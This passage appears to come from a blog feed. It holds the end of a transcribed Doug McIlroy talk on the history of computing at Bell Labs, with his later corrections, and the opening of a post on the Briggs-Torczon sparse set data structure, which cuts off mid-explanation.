be run more from paper tape. And the conditional transfer was this: you had two teletypes, and there’s a code that says "time to read from the other teletype". Loops were of course easy to do. You take paper and [laughter; presumably Doug curled a piece of paper to form a physical loop]. These machines never got to the point of having stored programs. But they got quite big. I saw, one of them was here in 1954, and I did see it, behind glass, and if you’ve ever seen these machines in the, there’s one in the Franklin Institute in Philadelphia, and there’s one in the Science Museum in San Jose, you know these machines that drop balls that go wandering sliding around and turning battle wheels and ringing bells and who knows what. It kind of looked like that. It was a very quiet room, with just a little clicking of relays, which is what a central office used to be like. It was the one air-conditioned room in Murray Hill, I think. This machine ran, the Mark VI, well I think that was the Mark V, the Mark VI actually went to Aberdeen. This machine ran for a good number of years, probably six, eight. 
And it is said that it never made an undetected error. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">8:30</span> What that means is that it never made an error that it did not diagnose itself and stop. Relay technology was very very defensive. The telephone switching system had to work. It was full of self-checking, and so were the calculators, so were the calculators that Stibitz made.</p> <p class=pp><span style="font-size: 0.7em;">9:04</span> Arithmetic was done in bi-quinary, a two out of five representation for decimal integers, and if there weren’t exactly two out of five relays activated it would stop. This machine ran unattended over the weekends. People would bring their tapes in, and the operator would paste everybody’s tapes together. There was a beginning of job code on the tape and there was also a time indicator. If the machine ran out of time, it automatically stopped and went to the next job. If the machine caught itself in an error, it backed up to the current job and tried it again. They would load this machine on Friday night, and on Monday morning, all the tapes, all the entries would be available on output tapes.</p> <p class=pp>Question: I take it they were using a different representation for loops and conditionals by then.</p> <p class=pp>Doug: Loops were done actually by they would run back and forth across the tape now, on this machine.</p> <p class=pp><span style="font-size: 0.7em;">10:40</span> Then came the transistor in ’48. At Whippany, they actually had a transistorized computer, which was a respectable minicomputer, a box about this big, running in 1954, it ran from 1954 to 1956 solidly as a test run. The notion was that this computer might fly in an airplane. And during that two-year test run, one diode failed. In 1957, this machine called <a href="http://www.cedmagic.com/history/tradic-transistorized.html">TRADIC</a>, did in fact fly in an airplane, but to the best of my knowledge, that machine was a demonstration machine. It didn’t turn into a production machine. About that time, we started buying commercial machines. It’s wonderful to think about the set of different architectures that existed in that time. The first machine we got was called a <a href="http://www.columbia.edu/acis/history/cpc.html">CPC from IBM</a>. And all it was was a big accounting machine with a very special plugboard on the side that provided an interpreter for doing ten-digit decimal arithmetic, including opcodes for the trig functions and square root.</p> <p class=pp><span style="font-size: 0.7em;">12:30</span> It was also not a computer as we know it today, because it wasn’t stored program, it had twenty-four memory locations as I recall, and it took its program instead of from tapes, from cards. This was not a total advantage. A tape didn’t get into trouble if you dropped it on the floor. [laughter]. CPC, the operator would stand in front of it, and there, you would go through loops by taking cards out, it took human intervention, to take the cards out of the output of the card reader and put them in the ?top?. I actually ran some programs on the CPC ?...?. It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">13:30</span> The next machine was an <a href="http://www.columbia.edu/acis/history/650.html">IBM 650</a>, and here, this was a stored program, with the memory being on drum. There was no operating system for it. It came with a manual: this is what the machine does. 
And Michael Wolontis made an interpreter called the <a href="http://hopl.info/showlanguage2.prx?exp=6497">L1 interpreter</a> for this machine, so you could actually program in, the manual told you how to program in binary, and L1 allowed you to give something like 10 for add and 9 for subtract, and program in decimal instead. And of course that machine required interesting optimization, because it was a nice thing if the next program step were stored somewhere -- each program step had the address of the following step in it, and you would try to locate them around the drum so to minimize latency. So there were all kinds of optimizers around, but I don’t think Bell Labs made ?...? based on this called "soap" from Carnegie Mellon. That machine didn’t last very long. Fortunately, a machine with core memory came out from IBM in about ’56, the 704. Bell Labs was a little slow in getting one, in ’58. Again, the machine came without an operating system. In fact, but it did have Fortran, which really changed the world. It suddenly made it easy to write programs. But the way Fortran came from IBM, it came with a thing called the Fortran Stop Book. This was a list of what happened, a diagnostic would execute the halt instruction, the operator would go read the panel lights and discover where the machine had stopped, you would then go look up in the stop book what that meant. Bell Labs, with George Mealy and Gwen Hanson, made an operating system, and one of the things they did was to bring the stop book to heel. They took the compiler, replaced all the stop instructions with jumps to somewhere, and allowed the program instead of stopping to go on to the next trial. By the time I arrived at Bell Labs in 1958, this thing was running nicely.</p> <p class=pp>[<i>McIlroy comments, 2015</i>: I’m pretty sure I was wrong in saying Mealy and Hanson brought the stop book to heel. They built the OS, but I believe Dolores Leagus tamed Fortran. (Dolores was the most accurate programmer I ever knew. She’d write 2000 lines of code before testing a single line--and it would work.)]</p> <p class=pp><span style="font-size: 0.7em;">16:36</span> Bell Labs continued to be a major player in operating systems. This was called BESYS. BE was the SHARE abbreviation for Bell Labs. Each company that belonged to Share, which was the IBM users group, ahd a two letter abbreviation. It’s hard to imagine taking all the computer users now and giving them a two-letter abbreviation. BESYS went through many generations, up to BESYS 5, I believe. Each one with innovations. IBM delivered a machine, the 7090, in 1960. This machine had interrupts in it, but IBM didn’t use them. But BESYS did. And that sent IBM back to the drawing board to make it work. [Laughter]</p> <p class=pp><span style="font-size: 0.7em;">17:48</span> Rob Pike: It also didn’t have memory protection.</p> <p class=pp>Doug: It didn’t have memory protection either, and a lot of people actually got IBM to put memory protection in the 7090, so that one could leave the operating system resident in the presence of a wild program, an idea that the PC didn’t discover until, last year or something like that. [laughter]</p> <p class=pp>Big players then, <a href="http://en.wikipedia.org/wiki/Richard_Hamming">Dick Hamming</a>, a name that I’m sure everybody knows, was sort of the numerical analysis guru, and a seer. He liked to make outrageous predictions. He predicted in 1960, that half of Bell Labs was going to be busy doing something with computers eventually. ?...? 
exaggerating some ?...? abstract in his thought. He was wrong. Half was a gross underestimate. Dick Hamming retired twenty years ago, and just this June he completed his full twenty years term in the Navy, which entitles him again to retire from the Naval Postgraduate Institute in Monterey. Stibitz, incidentally died, I think within the last year. He was doing medical instrumentation at Dartmouth essentially, near the end.</p> <p class=pp>[<i>McIlroy comments, 2015</i>: I’m not sure what exact unintelligible words I uttered about Dick Hamming. When he predicted that half the Bell Labs budget would be related to computing in a decade, people scoffed in terms like &ldquo;that’s just Dick being himelf, exaggerating for effect&rdquo;.]</p> <p class=pp><span style="font-size: 0.7em;">20:00</span> Various problems intrigued, besides the numerical problems, which in fact were stock in trade, and were the real justification for buying machines, until at least the ’70s I would say. But some non-numerical problems had begun to tickle the palette of the math department. Even G A Campbell got interested in graph theory, the reason being he wanted to think of all the possible ways you could take the three wires and the various parts of the telephone and connect them together, and try permutations to see what you could do about reducing sidetone by putting things into the various parts of the circuit, and devised every possibly way of connecting the telephone up. And that was sort of the beginning of combinatorics at Bell Labs. John Reardon, a mathematician parlayed this into a major subject. Two problems which are now deemed as computing problems, have intrigued the math department for a very long time, and those are the minimum spanning tree problem, and the wonderfully ?comment about Joe Kruskal, laughter?</p> <p class=pp><span style="font-size: 0.7em;">21:50</span> And in the 50s Bob Prim and Kruskal, who I don’t think worked on the Labs at that point, invented algorithms for the minimum spanning tree. Somehow or other, computer scientists usually learn these algorithms, one of the two at least, as Dijkstra’s algorithm, but he was a latecomer.</p> <p class=pp>[<i>McIlroy comments, 2015</i>: I erred in attributing Dijkstra’s algorithm to Prim and Kruskal. That honor belongs to yet a third member of the math department: Ed Moore. (Dijkstra’s algorithm is for shortest path, not spanning tree.)]</p> <p class=pp>Another pet was the traveling salesman. There’s been a long list of people at Bell Labs who played with that: Shen Lin and Ron Graham and David Johnson and dozens more, oh and ?...?. And then another problem is the Steiner minimum spanning tree, where you’re allowed to add points to the graph. Every one of these problems grew, actually had a justification in telephone billing. One jurisdiction or another would specify that the way you bill for a private line network was in one jurisdiction by the minimum spanning tree. In another jurisdiction, by the traveling salesman route. NP-completeness wasn’t a word in the vocabulary of lawmakers [laughter]. And the <a href="http://en.wikipedia.org/wiki/Steiner_tree">Steiner problem</a> came up because customers discovered they could beat the system by inventing offices in the middle of Tennessee that had nothing to do with their business, but they could put the office at a Steiner point and reduce their phone bill by adding to what the service that the Bell System had to give them. 
So all of these problems actually had some justification in billing besides the fun.</p> <p class=pp><span style="font-size: 0.7em;">24:15</span> Come the 60s, we actually started to hire people for computing per se. I was perhaps the third person who was hired with a Ph.D. to help take care of the computers and I’m told that the then director and head of the math department, Hendrick Bode, had said to his people, "yeah, you can hire this guy, instead of a real mathematician, but what’s he gonna be doing in five years?" [laughter]</p> <p class=pp><span style="font-size: 0.7em;">25:02</span> Nevertheless, we started hiring for real in about ’67. Computer science got split off from the math department. I had the good fortune to move into the office that I’ve been in ever since then. Computing began to make, get a personality of its own. One of the interesting people that came to Bell Labs for a while was Hao Wang. Is his name well known? [Pause] One nod. Hao Wang was a philosopher and logician, and we got a letter from him in England out of the blue saying "hey you know, can I come and use your computers? I have an idea about theorem proving." There was theorem proving in the air in the late 50s, and it was mostly pretty thin stuff. Obvious that the methods being proposed wouldn’t possibly do anything more difficult than solve tic-tac-toe problems by enumeration. Wang had a notion that he could mechanically prove theorems in the style of Whitehead and Russell’s great treatise Principia Mathematica in the early patr of the century. He came here, learned how to program in machine language, and took all of Volume I of Principia Mathematica -- if you’ve ever hefted Principia, well that’s about all it’s good for, it’s a real good door stop. It’s really big. But it’s theorem after theorem after theorem in propositional calculus. Of course, there’s a decision procedure for propositional calculus, but he was proving them more in the style of Whitehead and Russell. And when he finally got them all coded and put them into the computer, he proved the entire contents of this immense book in eight minutes. This was actually a neat accomplishment. Also that was the beginning of all the language theory. We hired people like <a href="http://www1.cs.columbia.edu/~aho/">Al Aho</a> and <a href="http://infolab.stanford.edu/~ullman/">Jeff Ullman</a>, who probed around every possible model of grammars, syntax, and all of the things that are now in the standard undergraduate curriculum, were pretty well nailed down here, on syntax and finite state machines and so on were pretty well nailed down in the 60s. Speaking of finite state machines, in the 50s, both Mealy and Moore, who have two of the well-known models of finite state machines, were here.</p> <p class=pp><span style="font-size: 0.7em;">28:40</span> During the 60s, we undertook an enormous development project in the guise of research, which was <a href="http://www.multicians.org/">MULTICS</a>, and it was the notion of MULTICS was computing was the public utility of the future. Machines were very expensive, and ?indeed? like you don’t own your own electric generator, you rely on the power company to do generation for you, and it was seen that this was a good way to do computing -- time sharing -- and it was also recognized that shared data was a very good thing. 
MIT pioneered this and Bell Labs joined in on the MULTICS project, and this occupied five years of system programming effort, until Bell Labs pulled out, because it turned out that MULTICS was too ambitious for the hardware at the time, and also with 80 people on it was not exactly a research project. But, that led to various people who were on the project, in particular <a href="http://en.wikipedia.org/wiki/Ken_Thompson">Ken Thompson</a> -- right there -- to think about how to -- <a href="http://en.wikipedia.org/wiki/Dennis_Ritchie">Dennis Ritchie</a> and Rudd Canaday were in on this too -- to think about how you might make a pleasant operating system with a little less resources.</p> <p class=pp><span style="font-size: 0.7em;">30:30</span> And Ken found -- this is a story that’s often been told, so I won’t go into very much of unix -- Ken found an old machine cast off in the corner, the <a href="http://en.wikipedia.org/wiki/PDP-7">PDP-7</a>, and put up this little operating system on it, and we had an immense <a href="http://en.wikipedia.org/wiki/GE-600_series">GE635</a> available at the comp center at the time, and I remember as the department head, muscling in to use this little computer to be, to get to be Unix’s first user, customer, because it was so much pleasanter to use this tiny machine than it was to use the big and capable machine in the comp center. And of course the rest of the story is known to everybody and has affected all college campuses in the country.</p> <p class=pp><span style="font-size: 0.7em;">31:33</span> Along with the operating system work, there was a fair amount of language work done at Bell Labs. Often curious off-beat languages. One of my favorites was called <a href="http://hopl.murdoch.edu.au/showlanguage.prx?exp=6937&language=BLODI-B">Blodi</a>, B L O D I, a block diagram compiler by Kelly and Vyssotsky. Perhaps the most interesting early uses of computers in the sense of being unexpected, were those that came from the acoustics research department, and the Blodi compiler was invented in the acoustic research department for doing digital simulations of sample data systems. DSPs are classic sample data systems, where instead of passing analog signals around, you pass around streams of numerical values. And Blodi allowed you to say here’s a delay unit, here’s an amplifier, here’s an adder, the standard piece parts for a sample data system, and each one was described on a card, with a description of what it’s wired to. It was then compiled into one enormous single straight line loop for one time step. Of course, you had to rearrange the code because one part of the sample data system would feed another, and it produced really very efficient 7090 code for simulating sample data systems. By and large, from that time forth, the acoustic department stopped making hardware. It was much easier to do signal processing digitally than previous ways that had been analog. Blodi had an interesting property. It was the only programming language I know where -- this is not my original observation, Vyssotsky said -- where you could take the deck of cards, throw it up the stairs, and pick them up at the bottom of the stairs, feed them into the computer again, and get the same program out.
Blodi had two, aside from syntax diagnostics, it did have one diagnostic when it would fail to compile, and that was "somewhere in your system is a loop that consists of all delays or has no delays" and you can imagine how they handled that.</p> <p class=pp><span style="font-size: 0.7em;">35:09</span> Another interesting programming language of the 60s was <a href="http://www.knowltonmosaics.com/">Ken Knowlton</a>’s <a href="http://beflix.com/beflix.php">Beflix</a>. This was for making movies on something with resolution kind of comparable to 640x480, really coarse, and the programming notion in here was bugs. You put on your grid a bunch of bugs, and each bug carried along some data as baggage, and then you would do things like cellular automata operations. You could program it or you could kind of let it go by itself. If a red bug is next to a blue bug then it turns into a green bug on the following step and so on. <span style="font-size: 0.7em;">36:28</span> He and Lillian Schwartz made some interesting abstract movies at the time. It also did some interesting picture processing. One wonderful picture of a reclining nude, something about the size of that blackboard over there, all made of pixels about a half inch high each with a different little picture in it, picked out for their density, and so if you looked at it close up it consisted of pickaxes and candles and dogs, and if you looked at it far enough away, it was a <a href="http://blog.the-eg.com/2007/12/03/ken-knowlton-mosaics/">reclining nude</a>. That picture got a lot of play all around the country.</p> <p class=pp>Lorinda Cherry: That was with Leon, wasn’t it? That was with <a href="https://en.wikipedia.org/wiki/Leon_Harmon">Leon Harmon</a>.</p> <p class=pp>Doug: Was that Harmon?</p> <p class=pp>Lorinda: ?...?</p> <p class=pp>Doug: Harmon was also an interesting character. He did more things than pictures. I’m glad you reminded me of him. I had him written down here. Harmon was a guy who among other things did a block diagram compiler for writing a handwriting recognition program. I never did understand how his scheme worked, and in fact I guess it didn’t work too well. [laughter] It didn’t do any production ?things? but it was an absolutely immense sample data circuit for doing handwriting recognition. Harmon’s most famous work was trying to estimate the information content in a face. And every one of these pictures which are a cliche now, that show a face digitized very coarsely, go back to Harmon’s <a href="https://web.archive.org/web/20080807162812/http://www.doubletakeimages.com/history.htm">first psychological experiments</a>, when he tried to find out how many bits of picture he needed to try to make a face recognizable. He went around and digitized about 256 faces from Bell Labs and did real psychological experiments asking which faces could be distinguished from other ones. I had the good fortune to have one of the most distinguishable faces, and consequently you’ll find me in freshman psychology texts through no fault of my own.</p> <p class=pp><span style="font-size: 0.7em;">39:15</span> Another thing going on in the 60s was the halting beginning here of interactive computing. And again the credit has to go to the acoustics research department, for good and sufficient reason. They wanted to be able to feed signals into the machine, and look at them, and get them back out.
They bought yet another weird architecture machine called the <a href="http://www.piercefuller.com/library/pb250.html">Packard Bell 250</a>, where the memory elements were <a href="http://en.wikipedia.org/wiki/Delay_line_memory">mercury delay lines</a>.</p> <p class=pp>Question: Packard Bell?</p> <p class=pp>Doug: Packard Bell, same one that makes PCs today.</p> <p class=pp><span style="font-size: 0.7em;">40:10</span> They hung this off of the comp center 7090 and put in a scheme for quickly shipping jobs into the job stream on the 7090. The Packard Bell was the real-time terminal that you could play with and repair stuff, ?...? off the 7090, get it back, and then you could play it. From that grew some graphics machines also, built by ?...? et al. And it was one of the old graphics machines in fact that Ken picked up to build Unix on.</p> <p class=pp><span style="font-size: 0.7em;">40:55</span> Another thing that went on in the acoustics department was synthetic speech and music. <a href="http://csounds.com/mathews/index.html">Max Mathews</a>, who was the director of the department, has long been interested in computer music. In fact since retirement he spent a lot of time with Pierre Boulez in Paris at a wonderful institute with lots of money simply for making synthetic music. He had a language called Music 5. Synthetic speech or, well first of all simply speech processing was pioneered particularly by <a href="http://en.wikipedia.org/wiki/John_Larry_Kelly,_Jr">John Kelly</a>. I remember my first contact with speech processing. It was customary for computer operators, for the benefit of computer operators, to put a loudspeaker on the low bit of some register on the machine, and normally the operator would just hear kind of white noise. But if you got into a loop, suddenly the machine would scream, and this signal could be used to tell the operator "oh, the machine’s in a loop. Go stop it and go on to the next job." I remember feeding them an Ackermann’s function routine once. [laughter] They were right. It was a silly loop. But anyway. One day, the operators were ?...?. The machine started singing. Out of the blue. &ldquo;Help! I’m caught in a loop.&rdquo; [laughter] And in a broad Texas accent, which was the recorded voice of John Kelly.</p> <p class=pp><span style="font-size: 0.7em;">43:14</span> However. From there Kelly went on to do some speech synthesis. Of course there’s been a lot more speech synthesis work done since, by <span style="font-size: 0.7em;">43:31</span> folks like Cecil Coker, Joe Olive. But they produced a record, which unfortunately I can’t play because records are not modern anymore. And everybody got one in the Bell Labs Record, which is a magazine that once contained a record from the acoustics department, with both speech and music and one very famous combination where the computer played and sang "A Bicycle Built For Two".</p> <p class=pp>?...?</p> <p class=pp><span style="font-size: 0.7em;">44:32</span> At the same time as all this stuff is going on here, needless to say computing is going on in the rest of the Labs. It was about early 1960 when the math department lost its monopoly on computing machines and other people started buying them too, but for switching. The first experiments with switching computers were operational in around 1960. They were planned for several years prior to that; essentially as soon as the transistor was invented, the making of electronic rather than electromechanical switching machines was anticipated.
Part of the saga of the switching machines is cheap memory. These machines had enormous memories -- thousands of words. [laughter] And it was said that the present worth of each word of memory that programmers saved across the Bell System was something like eleven dollars, as I recall. And it was worthwhile to struggle to save some memory. Also, programs were permanent. You were going to load up the switching machine with a switching program and that was going to run. You didn’t change it every minute or two. And it would be cheaper to put it in read only memory than in core memory. And there was a whole series of wild read-only memories, both tried and built. The first experimental Essex System had a thing called the flying spot store which was large photographic plates with bits on them and CRTs projecting on the plates and you would detect underneath on the photodetector whether the bit was set or not. That was the program store of Essex. The program store of the first ESS systems consisted of twistors, which I actually am not sure I understand to this day, but they consist of iron wire with a copper wire wrapped around them and vice versa. There were also experiments with an IC type memory called the waffle iron. Then there was a period when magnetic bubbles were all the rage. As far as I know, although microelectronics made a lot of memory, most of the memory work at Bell Labs has not had much effect on ?...?. Nice tries though.</p> <p class=pp><span style="font-size: 0.7em;">48:28</span> Another thing that folks began to work on was the application of (and of course, right from the start) computers to data processing. When you owned equipment scattered through every street in the country, and you have a hundred million customers, and you have bills for a hundred million transactions a day, there’s really some big data processing going on. And indeed in the early 60s, AT&T was thinking of making its own data processing computers solely for billing. Somehow they pulled out of that, and gave all the technology to IBM, and one piece of that technology went into use in high end equipment called tractor tapes. Inch-wide magnetic tapes that would be used for a while.</p> <p class=pp><span style="font-size: 0.7em;">49:50</span> By and large, although Bell Labs has participated until fairly recently in data processing in quite a big way, AT&T never really quite trusted the Labs to do it right because here is where the money is. I can recall one occasion when, during a strike, a temporary fill-in employee (from the Laboratories and so on) lost a day’s billing tape in Chicago. And that was a million dollars. And generally speaking, the money people did not until fairly recently trust Bell Labs to take good care of money, even though they trusted the Labs very well to make extremely reliable computing equipment for switches. The downtime on switches is still spectacular by any industry standards. The design for the first ones was two hours down in 40 years, and the design was met. Great emphasis on reliability and redundancy, testing.</p> <p class=pp><span style="font-size: 0.7em;">51:35</span> Another branch of computing was for the government. The whole Whippany Laboratories [time check] Whippany, where we took on contracts for the government particularly in the computing era in anti-missile defense, missile defense, and underwater sound. Missile defense was a very impressive undertaking.
It was about in the early ’63 time frame when it was estimated that the amount of computation to do a reasonable job of tracking incoming missiles would be 30 M floating point operations a second. In the day of the Cray that doesn’t sound like a great lot, but it’s more than your high end PCs can do. And the machines were supposed to be reliable. They designed the machines at Whippany, a twelve-processor multiprocessor, to no specs, enormously rugged, one watt transistors. This thing in real life performed remarkably well. There were sixty-five missile shots, tests across the Pacific Ocean ?...? and Lorinda Cherry here actually sat there waiting for them to come in. [laughter] And only a half dozen of them really failed. As a measure of the interest in reliability, one of them failed apparently due to processor error. Two people were assigned to look at the dumps; enormous amounts of telemetry and logging information were taken during these tests, which are truly expensive to run. Two people were assigned to look at the dumps. A year later they had not found the trouble. The team was beefed up. They finally decided that there was a race condition in one circuit. They then realized that this particular kind of race condition had not been tested for in all the simulations. They went back and simulated the entire hardware system to see if there was a remote possibility of any similar cases, found twelve of them, and changed the hardware. But to spend over a year looking for a bug is a sign of what reliability meant.</p> <p class=pp><span style="font-size: 0.7em;">54:56</span> Since I’m coming up on the end of an hour, one could go on and on and on,</p> <p class=pp>Crowd: go on, go on. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">55:10</span> Doug: I think I’d like to end up by mentioning a few of the programs that have been written at Bell Labs that I think are most surprising. Of course there are lots of grand programs that have been written.</p> <p class=pp>I already mentioned the block diagram compiler.</p> <p class=pp>Another really remarkable piece of work was <a href="eqn.pdf">eqn</a>, the equation typesetting language, by Lorinda Cherry and Brian Kernighan, which has been imitated since. The notion of taking an auditory syntax, the way people talk about equations, but only talk, this was not borrowed from any written notation before, getting the auditory one down on paper, that was very successful and surprising.</p> <p class=pp>Another of my favorites, and again Lorinda Cherry was in this one, with Bob Morris, was typo. This was a program for finding spelling errors. It didn’t know the first thing about spelling. It would read a document, measure its statistics, and print out the words of the document in increasing order of what it thought was the likelihood of that word having come from the same statistical source as the document. The words that did not come from the statistical source of the document were likely to be typos, and now I mean typos as distinct from spelling errors, where you actually hit the wrong key. Those tend to be off the wall, whereas phonetic spelling errors you’ll never find. And this worked remarkably well. Typing errors would come right up to the top of the list.
A really really neat program.</p> <p class=pp><span style="font-size: 0.7em;">57:50</span> Another one of my favorites was by Brenda Baker called <a href="http://doi.acm.org/10.1145/800168.811545">struct</a>, which took Fortran programs and converted them into a structured programming language called Ratfor, which was Fortran with C syntax. This seemed like a possible undertaking, like something you do by the seat of the pants and you get something out. In fact, folks at Lockheed had done things like that before. But Brenda managed to find theorems that said there’s really only one form, there’s a canonical form into which you can structure a Fortran program, and she did this. It took your Fortran program, completely mashed it, put it out perhaps in almost certainly a different order than it was in Fortran connected by GOTOs, without any GOTOs, and the really remarkable thing was that authors of the program who clearly knew the way they wrote it in the first place, preferred it after it had been rearranged by Brenda. I was astonished at the outcome of that project.</p> <p class=pp><span style="font-size: 0.7em;">59:19</span> Another first that happened around here was by Fred Grampp, who got interested in computer security. One day he decided he would make a program for sniffing the security arrangements on a computer, as a service: Fred would never do anything crooked. [laughter] This particular program did a remarkable job, and founded a whole minor industry within the company. A department was set up to take this idea and parlay it, and indeed ever since there has been some improvement in the way computer centers are managed, at least until we got Berkeley Unix.</p> <p class=pp><span style="font-size: 0.7em;">60:24</span> And the last interesting program that I have time to mention is one by <a href="http://www.cs.jhu.edu/~kchurch/">Ken Church</a>. He was dealing with -- text processing has always been a continuing ?...? of the research, and in some sense it has an application to our business because we’re handling speech, but he got into consulting with the department in North Carolina that has to translate manuals. There are millions of pages of manuals in the Bell System and its successors, and ever since we’ve gone global, these things had to get translated into many languages.</p> <p class=pp><span style="font-size: 0.7em;">61:28</span> To help in this, he was making tools which would put up on the screen, graphed on the screen quickly a piece of text and its translation, because a translator, particularly a technical translator, wants to know, the last time we mentioned this word how was it translated. You don’t want to be creative in translating technical text. You’d like to be able to go back into the archives and pull up examples of translated text. And the neat thing here is the idea for how do you align texts in two languages. You’ve got the original, you’ve got the translated one, how do you bring up on the screen, the two sentences that go together? And the following scam worked beautifully. This is on western languages. <span style="font-size: 0.7em;">62:33</span> Simply look for common four-letter tetragrams, four-letter combinations between the two and as best as you can, line them up as nearly linearly with the lengths of the two types as possible. And this <a href="church-tetragram.pdf">very simple idea</a> works like storm. Something for nothing.
I like that.</p> <p class=pp><span style="font-size: 0.7em;">63:10</span> The last thing is one slogan that sort of got started with Unix and is just rife within the industry now. Software tools. We were making software tools in Unix before we knew we were, just like the Molière character was amazed at discovering he’d been speaking prose all his life. [laughter] But then <a href="http://www.amazon.com/-/dp/020103669X">Kernighan and Plauger</a> came along and christened what was going on, making simple generally useful and compositional programs to do one thing and do it well and to fit together. They called it software tools, made a book, wrote a book, and this notion now is abroad in the industry. And it really did begin all up in the little attic room where you [points?] sat for many years writing up here.</p> <p class=pp> Oh I forgot to. I haven’t used any slides. I’ve brought some, but I don’t like looking at bullets and you wouldn’t either, and I forgot to show you the one exhibit I brought, which I borrowed from Bob Kurshan. When Bell Labs was founded, it had of course some calculating machines, and it had one wonderful computer. This. That was bought in 1918. There’s almost no other computing equipment from any time prior to ten years ago that still exists in Bell Labs. This is an <a href="http://infolab.stanford.edu/pub/voy/museum/pictures/display/2-5-Mechanical.html">integraph</a>. It has two styluses. You trace a curve on a piece of paper with one stylus and the other stylus draws the indefinite integral here. There was somebody in the math department who gave this service to the whole company, with about 24 hours turnaround time, calculating integrals. Our recent vice president Arno Penzias actually did, he calculated integrals differently, with a different background. He had a chemical balance, and he cut the curves out of the paper and weighed them. This was bought in 1918, so it’s eighty years old. It used to be shiny metal, it’s a little bit rusty now. But it still works.</p> <p class=pp><span style="font-size: 0.7em;">66:30</span> Well, that’s a once over lightly of a whole lot of things that have gone on at Bell Labs. It’s just such a fun place that one I said I just could go on and on. If you’re interested, there actually is a history written. This is only one of about six volumes, <a href="http://www.amazon.com/gp/product/0932764061">this</a> is the one that has the mathematical computer sciences, the kind of things that I’ve mostly talked about here. A few people have copies of them. For some reason, the AT&T publishing house thinks that because they’re history they’re obsolete, and they stopped printing them. [laughter]</p> <p class=pp>Thank you, and that’s all.</p></p> Using Uninitialized Memory for Fun and Profit tag:research.swtch.com,2012:research.swtch.com/sparse 2008-03-14T00:00:00-04:00 2008-03-14T00:00:00-04:00 An unusual but very useful data structure <p><p class=lp> This is the story of a clever trick that's been around for at least 35 years, in which array values can be left uninitialized and then read during normal operations, yet the code behaves correctly no matter what garbage is sitting in the array. Like the best programming tricks, this one is the right tool for the job in certain situations. The sleaziness of uninitialized data access is offset by performance improvements: some important operations change from linear to constant time. 
</p> <p class=pp> Alfred Aho, John Hopcroft, and Jeffrey Ullman's 1974 book <i>The Design and Analysis of Computer Algorithms</i> hints at the trick in an exercise (Chapter 2, exercise 2.12): </p> <blockquote> Develop a technique to initialize an entry of a matrix to zero the first time it is accessed, thereby eliminating the <i>O</i>(||<i>V</i>||<sup>2</sup>) time to initialize an adjacency matrix. </blockquote> <p class=lp> Jon Bentley's 1986 book <a href="http://www.cs.bell-labs.com/cm/cs/pearls/"><i>Programming Pearls</i></a> expands on the exercise (Column 1, exercise 8; <a href="http://www.cs.bell-labs.com/cm/cs/pearls/sec016.html">exercise 9</a> in the Second Edition): </p> <blockquote> One problem with trading more space for less time is that initializing the space can itself take a great deal of time. Show how to circumvent this problem by designing a technique to initialize an entry of a vector to zero the first time it is accessed. Your scheme should use constant time for initialization and each vector access; you may use extra space proportional to the size of the vector. Because this method reduces initialization time by using even more space, it should be considered only when space is cheap, time is dear, and the vector is sparse. </blockquote> <p class=lp> Aho, Hopcroft, and Ullman's exercise talks about a matrix and Bentley's exercise talks about a vector, but for now let's consider just a simple set of integers. </p> <p class=pp> One popular representation of a set of <i>n</i> integers ranging from 0 to <i>m</i> is a bit vector, with 1 bits at the positions corresponding to the integers in the set. Adding a new integer to the set, removing an integer from the set, and checking whether a particular integer is in the set are all very fast constant-time operations (just a few bit operations each). Unfortunately, two important operations are slow: iterating over all the elements in the set takes time <i>O</i>(<i>m</i>), as does clearing the set. If the common case is that <i>m</i> is much larger than <i>n</i> (that is, the set is only sparsely populated) and iterating or clearing the set happens frequently, then it could be better to use a representation that makes those operations more efficient. That's where the trick comes in. </p> <p class=pp> Preston Briggs and Linda Torczon's 1993 paper, &ldquo;<a href="http://citeseer.ist.psu.edu/briggs93efficient.html"><b>An Efficient Representation for Sparse Sets</b></a>,&rdquo; describes the trick in detail. Their solution represents the sparse set using an integer array named <code>dense</code> and an integer <code>n</code> that counts the number of elements in <code>dense</code>. The <i>dense</i> array is simply a packed list of the elements in the set, stored in order of insertion. If the set contains the elements 5, 1, and 4, then <code>n = 3</code> and <code>dense[0] = 5</code>, <code>dense[1] = 1</code>, <code>dense[2] = 4</code>: </p> <center> <img src="http://research.swtch.com/sparse0.png" /> </center> <p class=pp> Together <code>n</code> and <code>dense</code> are enough information to reconstruct the set, but this representation is not very fast. To make it fast, Briggs and Torczon add a second array named <code>sparse</code> which maps integers to their indices in <code>dense</code>. Continuing the example, <code>sparse[5] = 0</code>, <code>sparse[1] = 1</code>, <code>sparse[4] = 2</code>. 
Essentially, the set is a pair of arrays that point at each other: </p> <center> <img src="http://research.swtch.com/sparse0b.png" /> </center> <p class=pp> Adding a member to the set requires updating both of these arrays: </p> <pre class=indent> add-member(i): &nbsp;&nbsp;&nbsp;&nbsp;dense[n] = i &nbsp;&nbsp;&nbsp;&nbsp;sparse[i] = n &nbsp;&nbsp;&nbsp;&nbsp;n++ </pre> <p class=lp> It's not as efficient as flipping a bit in a bit vector, but it's still very fast and constant time. </p> <p class=pp> To check whether <code>i</code> is in the set, you verify that the two arrays point at each other for that element: </p> <pre class=indent> is-member(i): &nbsp;&nbsp;&nbsp;&nbsp;return sparse[i] &lt; n && dense[sparse[i]] == i </pre> <p class=lp> If <code>i</code> is not in the set, then <i>it doesn't matter what <code>sparse[i]</code> is set to</i>: either <code>sparse[i]</code> will be bigger than <code>n</code> or it will point at a value in <code>dense</code> that doesn't point back at it. Either way, we're not fooled. For example, suppose <code>sparse</code> actually looks like: </p> <center> <img src="http://research.swtch.com/sparse1.png" /> </center> <p class=lp> <code>Is-member</code> knows to ignore members of sparse that point past <code>n</code> or that point at cells in <code>dense</code> that don't point back, ignoring the grayed out entries: <center> <img src="http://research.swtch.com/sparse2.png" /> </center> <p class=pp> Notice what just happened: <code>sparse</code> can have <i>any arbitrary values</i> in the positions for integers not in the set, those values actually get used during membership tests, and yet the membership test behaves correctly! (This would drive <a href="http://valgrind.org/">valgrind</a> nuts.) </p> <p class=pp> Clearing the set can be done in constant time: </p> <pre class=indent> clear-set(): &nbsp;&nbsp;&nbsp;&nbsp;n = 0 </pre> <p class=lp> Zeroing <code>n</code> effectively clears <code>dense</code> (the code only ever accesses entries in dense with indices less than <code>n</code>), and <code>sparse</code> can be uninitialized, so there's no need to clear out the old values. </p> <p class=pp> This sparse set representation has 